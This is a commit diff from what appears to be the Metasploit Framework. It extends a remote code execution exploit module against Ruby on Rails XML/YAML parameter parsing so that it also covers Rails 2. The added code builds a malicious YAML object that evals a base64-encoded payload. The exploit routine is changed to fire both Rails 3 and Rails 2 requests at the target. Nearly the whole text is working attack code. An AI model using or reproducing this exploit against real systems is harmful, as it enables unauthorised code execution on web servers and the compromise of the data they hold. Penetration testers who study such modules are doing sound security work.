Merge in Rails2 support now that its in master
parent
bf013ba65f
commit
42ea64c21b
|
@ -22,9 +22,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
an attacker to instantiate a remote object, which in turn can be used to execute
|
||||
any ruby code remotely in the context of the application.
|
||||
|
||||
This module has been tested across multiple versions of RoR 3.x, but does not yet
|
||||
work against 2.x versions of RoR.
|
||||
|
||||
This module has been tested across multiple versions of RoR 3.x and RoR 2.x
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
|
@ -85,7 +83,25 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
#
|
||||
# Create the YAML document that will be embedded into the XML
|
||||
#
|
||||
def build_yaml
|
||||
def build_yaml_rails2
|
||||
|
||||
# Embed the payload with the detached stub
|
||||
code = Rex::Text.encode_base64( detached_payload_stub(payload.encoded) )
|
||||
yaml =
|
||||
"--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n" +
|
||||
"'#{Rex::Text.rand_text_alpha(rand(8)+1)}; " +
|
||||
"eval(%[#{code}].unpack(%[m0])[0]);' " +
|
||||
": !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n " +
|
||||
":#{Rex::Text.rand_text_alpha(rand(8)+1)}:\n :#{Rex::Text.rand_text_alpha(rand(8)+1)}: " +
|
||||
":#{Rex::Text.rand_text_alpha(rand(8)+1)}\n"
|
||||
yaml
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Create the YAML document that will be embedded into the XML
|
||||
#
|
||||
def build_yaml_rails3
|
||||
|
||||
# Embed the payload with the detached stub
|
||||
code = Rex::Text.encode_base64( detached_payload_stub(payload.encoded) )
|
||||
|
@ -101,7 +117,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
#
|
||||
# Create the XML wrapper with any desired evasion
|
||||
#
|
||||
def build_request
|
||||
def build_request(v)
|
||||
xml = ''
|
||||
|
||||
elo = Rex::Text.rand_text_alpha(rand(12)+4)
|
||||
|
@ -120,7 +136,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
el = Rex::Text.rand_text_alpha(rand(12)+4)
|
||||
xml << "<#{el} type='yaml'>"
|
||||
xml << build_yaml
|
||||
xml << (v == 2 ? build_yaml_rails2 : build_yaml_rails3)
|
||||
xml << "</#{el}>"
|
||||
|
||||
if datastore['XML::PadElement']
|
||||
|
@ -142,13 +158,22 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Send the actual request
|
||||
#
|
||||
def exploit
|
||||
data = build_request
|
||||
print_status("Sending #{data.length} bytes to #{rhost}:#{rport}...")
|
||||
|
||||
print_status("Sending Railsv3 request to #{rhost}:#{rport}...")
|
||||
res = send_request_cgi({
|
||||
'uri' => datastore['URIPATH'] || "/",
|
||||
'method' => datastore['HTTP_METHOD'],
|
||||
'ctype' => 'application/xml',
|
||||
'data' => data,
|
||||
'data' => build_request(3)
|
||||
}, 25)
|
||||
handler
|
||||
|
||||
print_status("Sending Railsv2 request to #{rhost}:#{rport}...")
|
||||
res = send_request_cgi({
|
||||
'uri' => datastore['URIPATH'] || "/",
|
||||
'method' => datastore['HTTP_METHOD'],
|
||||
'ctype' => 'application/xml',
|
||||
'data' => build_request(2)
|
||||
}, 25)
|
||||
handler
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue